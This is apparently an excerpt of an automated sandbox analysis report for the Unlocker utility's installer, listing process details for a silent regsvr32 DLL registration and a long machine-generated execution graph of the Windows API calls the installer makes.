                                                                                                                                                            Commandline:C:\Windows\system32\regsvr32.exe" /s "C:\Program Files\Unlocker\UnlockerCOM.dll
                                                                                                                                                            Imagebase:0x2f0000
                                                                                                                                                            File size:20992 bytes
                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Target ID:8
                                                                                                                                                            Start time:13:07:00
                                                                                                                                                            Start date:17/02/2023
                                                                                                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline: /s "C:\Program Files\Unlocker\UnlockerCOM.dll"
                                                                                                                                                            Imagebase:0x7ff7720a0000
                                                                                                                                                            File size:24064 bytes
                                                                                                                                                            MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Disassembly

                                                                                                                                                            Reset < >

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:34.6%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:23.6%
                                                                                                                                                              Total number of Nodes:1242
                                                                                                                                                              Total number of Limit Nodes:59
                                                                                                                                                              execution_graph 3953 401cc1 GetDlgItem GetClientRect 3954 4029f6 18 API calls 3953->3954 3955 401cf1 LoadImageA SendMessageA 3954->3955 3956 40288b 3955->3956 3957 401d0f DeleteObject 3955->3957 3957->3956 3958 401dc1 3959 4029f6 18 API calls 3958->3959 3960 401dc7 3959->3960 3961 4029f6 18 API calls 3960->3961 3962 401dd0 3961->3962 3963 4029f6 18 API calls 3962->3963 3964 401dd9 3963->3964 3965 4029f6 18 API calls 3964->3965 3966 401de2 3965->3966 3967 401423 25 API calls 3966->3967 3968 401de9 ShellExecuteA 3967->3968 3969 401e16 3968->3969 3970 401645 3971 4029f6 18 API calls 3970->3971 3972 40164c 3971->3972 3973 4029f6 18 API calls 3972->3973 3974 401655 3973->3974 3975 4029f6 18 API calls 3974->3975 3976 40165e MoveFileA 3975->3976 3977 401671 3976->3977 3978 40166a 3976->3978 3979 405cd8 2 API calls 3977->3979 3982 402169 3977->3982 3980 401423 25 API calls 3978->3980 3981 401680 3979->3981 3980->3982 3981->3982 3983 40572b 38 API calls 3981->3983 3983->3978 3984 401ec5 3985 4029f6 18 API calls 3984->3985 3986 401ecc GetFileVersionInfoSizeA 3985->3986 3987 401f45 3986->3987 3988 401eef GlobalAlloc 3986->3988 3988->3987 3989 401f03 GetFileVersionInfoA 3988->3989 3989->3987 3990 401f14 VerQueryValueA 3989->3990 3990->3987 3991 401f2d 3990->3991 3995 40593b wsprintfA 3991->3995 3993 401f39 3996 40593b wsprintfA 3993->3996 3995->3993 3996->3987 3021 4046ca GetDlgItem GetDlgItem 3022 40471e 7 API calls 3021->3022 3035 40493b 3021->3035 3023 4047c4 DeleteObject 3022->3023 3024 4047b7 SendMessageA 3022->3024 3025 4047cf 3023->3025 3024->3023 3026 404806 3025->3026 3031 4059ff 18 API calls 3025->3031 3075 403d8f 3026->3075 3027 404a25 3030 404ad4 3027->3030 3038 404cb6 3027->3038 3042 404a7e SendMessageA 3027->3042 3028 404a06 3028->3027 3039 404a17 SendMessageA 3028->3039 3032 404ae9 3030->3032 3033 404add SendMessageA 3030->3033 3034 4047e8 SendMessageA SendMessageA 3031->3034 3044 404b02 3032->3044 3045 404afb ImageList_Destroy 3032->3045 3053 404b12 3032->3053 3033->3032 3034->3025 3035->3027 3035->3028 3036 40499e 3035->3036 3088 40464a SendMessageA 3036->3088 3037 40481a 3041 403d8f 19 API calls 3037->3041 3096 403df6 3038->3096 3039->3027 3058 404828 3041->3058 3042->3038 3047 404a93 SendMessageA 3042->3047 3049 404b0b GlobalFree 3044->3049 3044->3053 3045->3044 3046 404c78 3046->3038 3054 404c8a ShowWindow GetDlgItem ShowWindow 3046->3054 3051 404aa6 3047->3051 3049->3053 3050 4048fc GetWindowLongA SetWindowLongA 3052 404915 3050->3052 3064 404ab7 SendMessageA 3051->3064 3055 404933 3052->3055 3056 40491b ShowWindow 3052->3056 3053->3046 3069 404b44 3053->3069 3093 40140b 3053->3093 3054->3038 3087 403dc4 SendMessageA 3055->3087 3086 403dc4 SendMessageA 3056->3086 3057 4049af 3057->3028 3058->3050 3061 404877 SendMessageA 3058->3061 3065 4048f6 3058->3065 3067 4048b3 SendMessageA 3058->3067 3068 4048c4 SendMessageA 3058->3068 3061->3058 3063 404b88 3070 404c4e InvalidateRect 3063->3070 3074 404bfc SendMessageA SendMessageA 3063->3074 3064->3030 3065->3050 3065->3052 3066 40492e 3066->3038 3067->3058 3068->3058 3069->3063 3071 404b72 SendMessageA 3069->3071 3070->3046 3072 404c64 3070->3072 3071->3063 3078 404568 3072->3078 3074->3063 3076 4059ff 18 API calls 3075->3076 3077 403d9a SetDlgItemTextA 3076->3077 3077->3037 3079 404582 3078->3079 3080 4059ff 18 API calls 3079->3080 3081 4045b7 3080->3081 3082 4059ff 18 API calls 3081->3082 3083 4045c2 3082->3083 3084 4059ff 18 API calls 3083->3084 3085 4045f3 lstrlenA wsprintfA SetDlgItemTextA 3084->3085 3085->3046 3086->3066 3087->3035 3089 4046a9 SendMessageA 3088->3089 3090 40466d GetMessagePos ScreenToClient SendMessageA 3088->3090 3091 4046a1 3089->3091 3090->3091 3092 4046a6 3090->3092 3091->3057 3092->3089 3110 401389 3093->3110 3097 403e97 3096->3097 3098 403e0e GetWindowLongA 3096->3098 3098->3097 3099 403e1f 3098->3099 3100 403e31 3099->3100 3101 403e2e GetSysColor 3099->3101 3102 403e41 SetBkMode 3100->3102 3103 403e37 SetTextColor 3100->3103 3101->3100 3104 403e59 GetSysColor 3102->3104 3105 403e5f 3102->3105 3103->3102 3104->3105 3106 403e70 3105->3106 3107 403e66 SetBkColor 3105->3107 3106->3097 3108 403e83 DeleteObject 3106->3108 3109 403e8a CreateBrushIndirect 3106->3109 3107->3106 3108->3109 3109->3097 3112 401390 3110->3112 3111 4013fe 3111->3069 3112->3111 3113 4013cb MulDiv SendMessageA 3112->3113 3113->3112 3114 4030cb #17 SetErrorMode OleInitialize 3184 405cff GetModuleHandleA 3114->3184 3118 403139 GetCommandLineA 3189 4059dd lstrcpynA 3118->3189 3120 40314b GetModuleHandleA 3121 403162 3120->3121 3122 4054fb CharNextA 3121->3122 3123 403176 CharNextA 3122->3123 3128 403183 3123->3128 3124 4031ec 3125 4031ff GetTempPathA 3124->3125 3190 403097 3125->3190 3127 403215 3129 403239 DeleteFileA 3127->3129 3130 403219 GetWindowsDirectoryA lstrcatA 3127->3130 3128->3124 3131 4054fb CharNextA 3128->3131 3135 4031ee 3128->3135 3198 402c22 GetTickCount GetModuleFileNameA 3129->3198 3132 403097 11 API calls 3130->3132 3131->3128 3134 403235 3132->3134 3134->3129 3138 4032b7 ExitProcess OleUninitialize 3134->3138 3280 4059dd lstrcpynA 3135->3280 3136 40324a 3136->3138 3139 4032a3 3136->3139 3144 4054fb CharNextA 3136->3144 3140 4033b1 3138->3140 3141 4032cc 3138->3141 3226 403526 3139->3226 3142 403434 ExitProcess 3140->3142 3147 405cff 3 API calls 3140->3147 3145 40529e MessageBoxIndirectA 3141->3145 3150 403261 3144->3150 3146 4032da ExitProcess 3145->3146 3151 4033c0 3147->3151 3148 4032b3 3148->3138 3153 4032e2 lstrcatA lstrcmpiA 3150->3153 3154 40327e 3150->3154 3152 405cff 3 API calls 3151->3152 3155 4033c9 3152->3155 3153->3138 3156 4032fe CreateDirectoryA SetCurrentDirectoryA 3153->3156 3281 4055b1 3154->3281 3158 405cff 3 API calls 3155->3158 3159 403320 3156->3159 3160 403315 3156->3160 3162 4033d2 3158->3162 3298 4059dd lstrcpynA 3159->3298 3297 4059dd lstrcpynA 3160->3297 3163 403420 ExitWindowsEx 3162->3163 3168 4033e0 GetCurrentProcess 3162->3168 3163->3142 3167 40342d 3163->3167 3170 40140b 2 API calls 3167->3170 3173 4033f0 3168->3173 3169 403298 3296 4059dd lstrcpynA 3169->3296 3170->3142 3172 4059ff 18 API calls 3174 403350 DeleteFileA 3172->3174 3173->3163 3175 40335d CopyFileA 3174->3175 3181 40332e 3174->3181 3175->3181 3176 4033a5 3177 40572b 38 API calls 3176->3177 3179 4033ac 3177->3179 3179->3138 3180 4059ff 18 API calls 3180->3181 3181->3172 3181->3176 3181->3180 3183 403391 CloseHandle 3181->3183 3299 40572b 3181->3299 3325 40523d CreateProcessA 3181->3325 3183->3181 3185 405d26 GetProcAddress 3184->3185 3186 405d1b LoadLibraryA 3184->3186 3187 40310e SHGetFileInfoA 3185->3187 3186->3185 3186->3187 3188 4059dd lstrcpynA 3187->3188 3188->3118 3189->3120 3191 405c3f 5 API calls 3190->3191 3193 4030a3 3191->3193 3192 4030ad 3192->3127 3193->3192 3328 4054d0 lstrlenA CharPrevA 3193->3328 3335 4056b4 GetFileAttributesA CreateFileA 3198->3335 3200 402c62 3218 402c72 3200->3218 3336 4059dd lstrcpynA 3200->3336 3202 402c88 3337 405517 lstrlenA 3202->3337 3206 402c99 GetFileSize 3207 402d95 3206->3207 3220 402cb0 3206->3220 3342 402bbe 3207->3342 3209 402d9e 3211 402dce GlobalAlloc 3209->3211 3209->3218 3353 403080 SetFilePointer 3209->3353 3210 40304e ReadFile 3210->3220 3354 403080 SetFilePointer 3211->3354 3213 402e01 3215 402bbe 6 API calls 3213->3215 3215->3218 3216 402db7 3219 40304e ReadFile 3216->3219 3217 402de9 3221 402e5b 37 API calls 3217->3221 3218->3136 3222 402dc2 3219->3222 3220->3207 3220->3210 3220->3213 3220->3218 3223 402bbe 6 API calls 3220->3223 3224 402df5 3221->3224 3222->3211 3222->3218 3223->3220 3224->3218 3224->3224 3225 402e32 SetFilePointer 3224->3225 3225->3218 3227 405cff 3 API calls 3226->3227 3228 40353a 3227->3228 3229 403540 3228->3229 3230 403552 3228->3230 3375 40593b wsprintfA 3229->3375 3231 4058c4 3 API calls 3230->3231 3232 403573 3231->3232 3234 403591 lstrcatA 3232->3234 3235 4058c4 3 API calls 3232->3235 3236 403550 3234->3236 3235->3234 3359 4037ef 3236->3359 3239 4055b1 18 API calls 3240 4035c3 3239->3240 3241 40364c 3240->3241 3243 4058c4 3 API calls 3240->3243 3242 4055b1 18 API calls 3241->3242 3244 403652 3242->3244 3245 4035ef 3243->3245 3246 403662 LoadImageA 3244->3246 3247 4059ff 18 API calls 3244->3247 3245->3241 3253 40360b lstrlenA 3245->3253 3257 4054fb CharNextA 3245->3257 3248 403716 3246->3248 3249 40368d RegisterClassA 3246->3249 3247->3246 3252 40140b 2 API calls 3248->3252 3250 403720 3249->3250 3251 4036c9 SystemParametersInfoA CreateWindowExA 3249->3251 3250->3148 3251->3248 3256 40371c 3252->3256 3254 403619 lstrcmpiA 3253->3254 3255 40363f 3253->3255 3254->3255 3258 403629 GetFileAttributesA 3254->3258 3259 4054d0 3 API calls 3255->3259 3256->3250 3262 4037ef 19 API calls 3256->3262 3260 403609 3257->3260 3261 403635 3258->3261 3263 403645 3259->3263 3260->3253 3261->3255 3264 405517 2 API calls 3261->3264 3265 40372d 3262->3265 3376 4059dd lstrcpynA 3263->3376 3264->3255 3267 403739 ShowWindow LoadLibraryA 3265->3267 3268 4037bc 3265->3268 3270 403758 LoadLibraryA 3267->3270 3271 40375f GetClassInfoA 3267->3271 3368 404e4d OleInitialize 3268->3368 3270->3271 3273 403773 GetClassInfoA RegisterClassA 3271->3273 3274 403789 DialogBoxParamA 3271->3274 3272 4037c2 3275 4037de 3272->3275 3277 4037c6 3272->3277 3273->3274 3276 40140b 2 API calls 3274->3276 3278 40140b 2 API calls 3275->3278 3276->3250 3277->3250 3279 40140b 2 API calls 3277->3279 3278->3250 3279->3250 3280->3125 3381 4059dd lstrcpynA 3281->3381 3283 4055c2 3382 405564 CharNextA CharNextA 3283->3382 3286 403289 3286->3138 3295 4059dd lstrcpynA 3286->3295 3287 405c3f 5 API calls 3293 4055d8 3287->3293 3288 405603 lstrlenA 3289 40560e 3288->3289 3288->3293 3290 4054d0 3 API calls 3289->3290 3292 405613 GetFileAttributesA 3290->3292 3292->3286 3293->3286 3293->3288 3294 405517 2 API calls 3293->3294 3388 405cd8 FindFirstFileA 3293->3388 3294->3288 3295->3169 3296->3139 3297->3159 3298->3181 3300 405cff 3 API calls 3299->3300 3301 405736 3300->3301 3302 405793 GetShortPathNameA 3301->3302 3305 405888 3301->3305 3391 4056b4 GetFileAttributesA CreateFileA 3301->3391 3304 4057a8 3302->3304 3302->3305 3304->3305 3307 4057b0 wsprintfA 3304->3307 3305->3181 3306 405777 CloseHandle GetShortPathNameA 3306->3305 3308 40578b 3306->3308 3309 4059ff 18 API calls 3307->3309 3308->3302 3308->3305 3310 4057d8 3309->3310 3392 4056b4 GetFileAttributesA CreateFileA 3310->3392 3312 4057e5 3312->3305 3313 4057f4 GetFileSize GlobalAlloc 3312->3313 3314 405881 CloseHandle 3313->3314 3315 405812 ReadFile 3313->3315 3314->3305 3315->3314 3316 405826 3315->3316 3316->3314 3393 405629 lstrlenA 3316->3393 3319 405895 3322 405629 4 API calls 3319->3322 3320 40583b 3398 4059dd lstrcpynA 3320->3398 3323 405849 3322->3323 3324 40585c SetFilePointer WriteFile GlobalFree 3323->3324 3324->3314 3326 405278 3325->3326 3327 40526c CloseHandle 3325->3327 3326->3181 3327->3326 3329 4030b5 CreateDirectoryA 3328->3329 3330 4054ea lstrcatA 3328->3330 3331 4056e3 3329->3331 3330->3329 3332 4056ee GetTickCount GetTempFileNameA 3331->3332 3333 40571a 3332->3333 3334 4030c9 3332->3334 3333->3332 3333->3334 3334->3127 3335->3200 3336->3202 3338 405524 3337->3338 3339 402c8e 3338->3339 3340 405529 CharPrevA 3338->3340 3341 4059dd lstrcpynA 3339->3341 3340->3338 3340->3339 3341->3206 3343 402bc7 3342->3343 3344 402bdf 3342->3344 3345 402bd0 DestroyWindow 3343->3345 3346 402bd7 3343->3346 3347 402be7 3344->3347 3348 402bef GetTickCount 3344->3348 3345->3346 3346->3209 3355 405d38 3347->3355 3350 402c20 3348->3350 3351 402bfd CreateDialogParamA ShowWindow 3348->3351 3350->3209 3351->3350 3353->3216 3354->3217 3356 405d55 PeekMessageA 3355->3356 3357 402bed 3356->3357 3358 405d4b DispatchMessageA 3356->3358 3357->3209 3358->3356 3360 403803 3359->3360 3377 40593b wsprintfA 3360->3377 3362 403874 3363 4059ff 18 API calls 3362->3363 3364 403880 SetWindowTextA 3363->3364 3365 4035a1 3364->3365 3366 40389c 3364->3366 3365->3239 3366->3365 3367 4059ff 18 API calls 3366->3367 3367->3366 3378 403ddb 3368->3378 3370 404e97 3371 403ddb SendMessageA 3370->3371 3373 404ea9 OleUninitialize 3371->3373 3372 404e70 3372->3370 3374 401389 2 API calls 3372->3374 3373->3272 3374->3372 3375->3236 3376->3241 3377->3362 3379 403df3 3378->3379 3380 403de4 SendMessageA 3378->3380 3379->3372 3380->3379 3381->3283 3383 40557e 3382->3383 3387 40558a 3382->3387 3384 405585 CharNextA 3383->3384 3383->3387 3385 4055a7 3384->3385 3385->3286 3385->3287 3386 4054fb CharNextA 3386->3387 3387->3385 3387->3386 3389 405cf9 3388->3389 3390 405cee FindClose 3388->3390 3389->3293 3390->3389 3391->3306 3392->3312 3394 40565f lstrlenA 3393->3394 3395 405669 3394->3395 3396 40563d lstrcmpiA 3394->3396 3395->3319 3395->3320 3396->3395 3397 405656 CharNextA 3396->3397 3397->3394 3398->3323 3399 404ccb 3400 404cf0 3399->3400 3401 404cd9 3399->3401 3403 404cfe IsWindowVisible 3400->3403 3410 404d1c 3400->3410 3402 404cdf 3401->3402 3418 404d59 3401->3418 3404 403ddb SendMessageA 3402->3404 3406 404d0b 3403->3406 3403->3418 3407 404ce9 3404->3407 3405 404d5f CallWindowProcA 3405->3407 3408 40464a 5 API calls 3406->3408 3409 404d15 3408->3409 3409->3410 3410->3405 3419 4059dd lstrcpynA 3410->3419 3412 404d44 3420 40593b wsprintfA 3412->3420 3414 404d4b 3415 40140b 2 API calls 3414->3415 3416 404d52 3415->3416 3421 4059dd lstrcpynA 3416->3421 3418->3405 3419->3412 3420->3414 3421->3418 3422 40344c 3423 403464 3422->3423 3424 403456 CloseHandle 3422->3424 3429 403491 3423->3429 3424->3423 3430 40349f 3429->3430 3431 403469 3430->3431 3432 4034a4 FreeLibrary GlobalFree 3430->3432 3433 405302 3431->3433 3432->3431 3432->3432 3434 4055b1 18 API calls 3433->3434 3435 405316 3434->3435 3436 405336 3435->3436 3437 40531f DeleteFileA 3435->3437 3439 40546b 3436->3439 3474 4059dd lstrcpynA 3436->3474 3438 403475 3437->3438 3439->3438 3444 405cd8 2 API calls 3439->3444 3441 405360 3442 405371 3441->3442 3443 405364 lstrcatA 3441->3443 3446 405517 2 API calls 3442->3446 3445 405377 3443->3445 3447 405490 3444->3447 3448 405385 lstrcatA 3445->3448 3449 405390 lstrlenA FindFirstFileA 3445->3449 3446->3445 3447->3438 3450 4054d0 3 API calls 3447->3450 3448->3449 3449->3439 3464 4053b4 3449->3464 3452 40549a 3450->3452 3451 4054fb CharNextA 3451->3464 3453 405695 2 API calls 3452->3453 3454 4054a0 RemoveDirectoryA 3453->3454 3455 4054c2 3454->3455 3456 4054ab 3454->3456 3457 404d7b 25 API calls 3455->3457 3456->3438 3460 4054b1 3456->3460 3457->3438 3458 40544a FindNextFileA 3461 405462 FindClose 3458->3461 3458->3464 3462 404d7b 25 API calls 3460->3462 3461->3439 3463 4054b9 3462->3463 3465 40572b 38 API calls 3463->3465 3464->3451 3464->3458 3467 405302 59 API calls 3464->3467 3470 404d7b 25 API calls 3464->3470 3473 405428 3464->3473 3475 4059dd lstrcpynA 3464->3475 3476 405695 GetFileAttributesA 3464->3476 3468 4054c0 3465->3468 3467->3464 3468->3438 3470->3458 3471 404d7b 25 API calls 3471->3473 3472 40572b 38 API calls 3472->3473 3473->3458 3473->3471 3473->3472 3474->3441 3475->3464 3477 405417 DeleteFileA 3476->3477 3478 4056a4 SetFileAttributesA 3476->3478 3477->3464 3478->3477 4007 4025cc 4008 4025d3 4007->4008 4010 402838 4007->4010 4009 4029d9 18 API calls 4008->4009 4011 4025de 4009->4011 4012 4025e5 SetFilePointer 4011->4012 4012->4010 4013 4025f5 4012->4013 4015 40593b wsprintfA 4013->4015 4015->4010 3479 4041cd 3480 40420b 3479->3480 3481 4041fe 3479->3481 3483 404214 GetDlgItem 3480->3483 3489 404286 3480->3489 3549 405282 GetDlgItemTextA 3481->3549 3485 404228 3483->3485 3484 404205 3487 405c3f 5 API calls 3484->3487 3488 40423c SetWindowTextA 3485->3488 3493 405564 4 API calls 3485->3493 3486 40435b 3542 4044e7 3486->3542 3547 405282 GetDlgItemTextA 3486->3547 3487->3480 3491 403d8f 19 API calls 3488->3491 3489->3486 3494 4059ff 18 API calls 3489->3494 3489->3542 3498 40425a 3491->3498 3492 403df6 8 API calls 3499 4044fb 3492->3499 3500 404232 3493->3500 3496 4042ed SHBrowseForFolderA 3494->3496 3495 404387 3497 4055b1 18 API calls 3495->3497 3496->3486 3501 404305 CoTaskMemFree 3496->3501 3502 40438d 3497->3502 3503 403d8f 19 API calls 3498->3503 3500->3488 3506 4054d0 3 API calls 3500->3506 3504 4054d0 3 API calls 3501->3504 3548 4059dd lstrcpynA 3502->3548 3505 404268 3503->3505 3507 404312 3504->3507 3546 403dc4 SendMessageA 3505->3546 3506->3488 3510 404349 SetDlgItemTextA 3507->3510 3515 4059ff 18 API calls 3507->3515 3510->3486 3511 4043a4 3513 405cff 3 API calls 3511->3513 3512 404270 3514 405cff 3 API calls 3512->3514 3524 4043ac 3513->3524 3516 404277 3514->3516 3517 404331 lstrcmpiA 3515->3517 3519 40427f SHAutoComplete 3516->3519 3516->3542 3517->3510 3521 404342 lstrcatA 3517->3521 3518 4043e6 3550 4059dd lstrcpynA 3518->3550 3519->3489 3521->3510 3522 4043b9 GetDiskFreeSpaceExA 3522->3524 3532 404439 3522->3532 3523 4043ef 3525 405564 4 API calls 3523->3525 3524->3518 3524->3522 3527 405517 2 API calls 3524->3527 3526 4043f5 3525->3526 3528 4043f9 3526->3528 3529 4043fc GetDiskFreeSpaceA 3526->3529 3527->3524 3528->3529 3530 404451 3529->3530 3531 404417 MulDiv 3529->3531 3530->3532 3531->3532 3533 404568 21 API calls 3532->3533 3543 404496 3532->3543 3535 404488 3533->3535 3534 4044b9 3551 403db1 KiUserCallbackDispatcher 3534->3551 3537 404498 SetDlgItemTextA 3535->3537 3538 40448d 3535->3538 3536 40140b 2 API calls 3536->3534 3537->3543 3541 404568 21 API calls 3538->3541 3540 4044d5 3540->3542 3544 4044e2 3540->3544 3541->3543 3542->3492 3543->3534 3543->3536 3552 404162 3544->3552 3546->3512 3547->3495 3548->3511 3549->3484 3550->3523 3551->3540 3553 404170 3552->3553 3554 404175 SendMessageA 3552->3554 3553->3554 3554->3542 3561 401f51 3562 401f63 3561->3562 3563 402012 3561->3563 3564 4029f6 18 API calls 3562->3564 3566 401423 25 API calls 3563->3566 3565 401f6a 3564->3565 3567 4029f6 18 API calls 3565->3567 3571 402169 3566->3571 3568 401f73 3567->3568 3569 401f88 LoadLibraryExA 3568->3569 3570 401f7b GetModuleHandleA 3568->3570 3569->3563 3572 401f98 GetProcAddress 3569->3572 3570->3569 3570->3572 3573 401fe5 3572->3573 3574 401fa8 3572->3574 3575 404d7b 25 API calls 3573->3575 3577 401fb8 3574->3577 3579 401423 3574->3579 3575->3577 3577->3571 3578 402006 FreeLibrary 3577->3578 3578->3571 3580 404d7b 25 API calls 3579->3580 3581 401431 3580->3581 3581->3577 4016 4014d6 4017 4029d9 18 API calls 4016->4017 4018 4014dc Sleep 4017->4018 4020 40288b 4018->4020 3590 403ed7 3591 403eed 3590->3591 3595 403ffa 3590->3595 3593 403d8f 19 API calls 3591->3593 3592 404069 3594 404073 GetDlgItem 3592->3594 3596 40413d 3592->3596 3597 403f43 3593->3597 3598 404089 3594->3598 3599 4040fb 3594->3599 3595->3592 3595->3596 3600 40403e GetDlgItem SendMessageA 3595->3600 3601 403df6 8 API calls 3596->3601 3602 403d8f 19 API calls 3597->3602 3598->3599 3606 4040af 6 API calls 3598->3606 3599->3596 3607 40410d 3599->3607 3621 403db1 KiUserCallbackDispatcher 3600->3621 3604 404138 3601->3604 3605 403f50 CheckDlgButton 3602->3605 3619 403db1 KiUserCallbackDispatcher 3605->3619 3606->3599 3610 404113 SendMessageA 3607->3610 3611 404124 3607->3611 3608 404064 3613 404162 SendMessageA 3608->3613 3610->3611 3611->3604 3612 40412a SendMessageA 3611->3612 3612->3604 3613->3592 3614 403f6e GetDlgItem 3620 403dc4 SendMessageA 3614->3620 3616 403f84 SendMessageA 3617 403fa2 GetSysColor 3616->3617 3618 403fab SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3616->3618 3617->3618 3618->3604 3619->3614 3620->3616 3621->3608 4026 4018d8 4027 40190f 4026->4027 4028 4029f6 18 API calls 4027->4028 4029 401914 4028->4029 4030 405302 68 API calls 4029->4030 4031 40191d 4030->4031 4032 4018db 4033 4029f6 18 API calls 4032->4033 4034 4018e2 4033->4034 4035 40529e MessageBoxIndirectA 4034->4035 4036 4018eb 4035->4036 4051 4034e4 4052 4034ef 4051->4052 4053 4034f3 4052->4053 4054 4034f6 GlobalAlloc 4052->4054 4054->4053 4062 401ae5 4063 4029f6 18 API calls 4062->4063 4064 401aec 4063->4064 4065 4029d9 18 API calls 4064->4065 4066 401af5 wsprintfA 4065->4066 4067 40288b 4066->4067 3673 402866 SendMessageA 3674 402880 InvalidateRect 3673->3674 3675 40288b 3673->3675 3674->3675 4068 4019e6 4069 4029f6 18 API calls 4068->4069 4070 4019ef ExpandEnvironmentStringsA 4069->4070 4071 401a03 4070->4071 4073 401a16 4070->4073 4072 401a08 lstrcmpA 4071->4072 4071->4073 4072->4073 3676 402267 3677 4029f6 18 API calls 3676->3677 3678 402275 3677->3678 3679 4029f6 18 API calls 3678->3679 3680 40227e 3679->3680 3681 4029f6 18 API calls 3680->3681 3682 402288 GetPrivateProfileStringA 3681->3682 4074 401c6d 4075 4029d9 18 API calls 4074->4075 4076 401c73 IsWindow 4075->4076 4077 4019d6 4076->4077 4078 4014f0 SetForegroundWindow 4079 40288b 4078->4079 4080 402172 4081 4029f6 18 API calls 4080->4081 4082 402178 4081->4082 4083 4029f6 18 API calls 4082->4083 4084 402181 4083->4084 4085 4029f6 18 API calls 4084->4085 4086 40218a 4085->4086 4087 405cd8 2 API calls 4086->4087 4088 402193 4087->4088 4089 4021a4 lstrlenA lstrlenA 4088->4089 4090 402197 4088->4090 4091 404d7b 25 API calls 4089->4091 4092 404d7b 25 API calls 4090->4092 4094 40219f 4090->4094 4093 4021e0 SHFileOperationA 4091->4093 4092->4094 4093->4090 4093->4094 4095 4021f4 4096 4021fb 4095->4096 4097 40220e 4095->4097 4098 4059ff 18 API calls 4096->4098 4099 402208 4098->4099 4100 40529e MessageBoxIndirectA 4099->4100 4100->4097 4101 4062f4 4105 405e2c 4101->4105 4102 406797 4103 405eb6 GlobalAlloc 4103->4102 4103->4105 4104 405ead GlobalFree 4104->4103 4105->4102 4105->4103 4105->4104 4105->4105 4106 405f24 GlobalFree 4105->4106 4107 405f2d GlobalAlloc 4105->4107 4106->4107 4107->4102 4107->4105 4108 4016fa 4109 4029f6 18 API calls 4108->4109 4110 401701 SearchPathA 4109->4110 4111 40171c 4110->4111 4112 4025fb 4113 402602 4112->4113 4114 40288b 4112->4114 4115 402608 FindClose 4113->4115 4115->4114 3854 40267c 3855 4029f6 18 API calls 3854->3855 3857 40268a 3855->3857 3856 4026a0 3859 405695 2 API calls 3856->3859 3857->3856 3858 4029f6 18 API calls 3857->3858 3858->3856 3860 4026a6 3859->3860 3880 4056b4 GetFileAttributesA CreateFileA 3860->3880 3862 4026b3 3863 40275c 3862->3863 3864 4026bf GlobalAlloc 3862->3864 3865 402764 DeleteFileA 3863->3865 3866 402777 3863->3866 3867 402753 CloseHandle 3864->3867 3868 4026d8 3864->3868 3865->3866 3867->3863 3881 403080 SetFilePointer 3868->3881 3870 4026de 3871 40304e ReadFile 3870->3871 3872 4026e7 GlobalAlloc 3871->3872 3873 4026f7 3872->3873 3874 40272b WriteFile GlobalFree 3872->3874 3875 402e5b 37 API calls 3873->3875 3876 402e5b 37 API calls 3874->3876 3879 402704 3875->3879 3877 402750 3876->3877 3877->3867 3878 402722 GlobalFree 3878->3874 3879->3878 3880->3862 3881->3870 4116 4014fe 4117 401506 4116->4117 4119 401519 4116->4119 4118 4029d9 18 API calls 4117->4118 4118->4119 4120 401000 4121 401037 BeginPaint GetClientRect 4120->4121 4123 40100c DefWindowProcA 4120->4123 4124 4010f3 4121->4124 4125 401179 4123->4125 4126 401073 CreateBrushIndirect FillRect DeleteObject 4124->4126 4127 4010fc 4124->4127 4126->4124 4128 401102 CreateFontIndirectA 4127->4128 4129 401167 EndPaint 4127->4129 4128->4129 4130 401112 6 API calls 4128->4130 4129->4125 4130->4129 4131 404502 4132 404512 4131->4132 4133 40452e 4131->4133 4142 405282 GetDlgItemTextA 4132->4142 4135 404561 4133->4135 4136 404534 SHGetPathFromIDListA 4133->4136 4138 40454b SendMessageA 4136->4138 4139 404544 4136->4139 4137 40451f SendMessageA 4137->4133 4138->4135 4141 40140b 2 API calls 4139->4141 4141->4138 4142->4137 2887 402303 2888 402309 2887->2888 2904 4029f6 2888->2904 2891 4029f6 18 API calls 2892 402325 RegCreateKeyExA 2891->2892 2893 40288b 2892->2893 2894 40234f 2892->2894 2895 402367 2894->2895 2896 4029f6 18 API calls 2894->2896 2897 402373 2895->2897 2910 4029d9 2895->2910 2900 402360 lstrlenA 2896->2900 2899 40238e RegSetValueExA 2897->2899 2913 402e5b 2897->2913 2902 4023a4 RegCloseKey 2899->2902 2900->2895 2902->2893 2905 402a02 2904->2905 2934 4059ff 2905->2934 2908 40231b 2908->2891 2911 4059ff 18 API calls 2910->2911 2912 4029ed 2911->2912 2912->2897 2915 402e71 2913->2915 2914 402e9c 2973 40304e ReadFile 2914->2973 2915->2914 2993 403080 SetFilePointer 2915->2993 2919 402fe2 2921 402fe6 2919->2921 2926 402ffe 2919->2926 2920 402eb9 GetTickCount 2930 402ecc 2920->2930 2923 40304e ReadFile 2921->2923 2922 402fcd 2922->2899 2923->2922 2924 40304e ReadFile 2924->2926 2925 40304e ReadFile 2925->2930 2926->2922 2926->2924 2927 403019 WriteFile 2926->2927 2927->2922 2927->2926 2929 402f32 GetTickCount 2929->2930 2930->2922 2930->2925 2930->2929 2931 402f5b MulDiv wsprintfA 2930->2931 2932 402f99 WriteFile 2930->2932 2975 405df9 2930->2975 2982 404d7b 2931->2982 2932->2922 2932->2930 2948 405a0c 2934->2948 2935 405c26 2936 402a23 2935->2936 2968 4059dd lstrcpynA 2935->2968 2936->2908 2952 405c3f 2936->2952 2938 405aa4 GetVersion 2938->2948 2939 405bfd lstrlenA 2939->2948 2942 4059ff 10 API calls 2942->2939 2943 405b1c GetSystemDirectoryA 2943->2948 2945 405b2f GetWindowsDirectoryA 2945->2948 2946 405c3f 5 API calls 2946->2948 2947 405ba6 lstrcatA 2947->2948 2948->2935 2948->2938 2948->2939 2948->2942 2948->2943 2948->2945 2948->2946 2948->2947 2949 405b63 SHGetSpecialFolderLocation 2948->2949 2950 4059ff 10 API calls 2948->2950 2961 4058c4 RegOpenKeyExA 2948->2961 2966 40593b wsprintfA 2948->2966 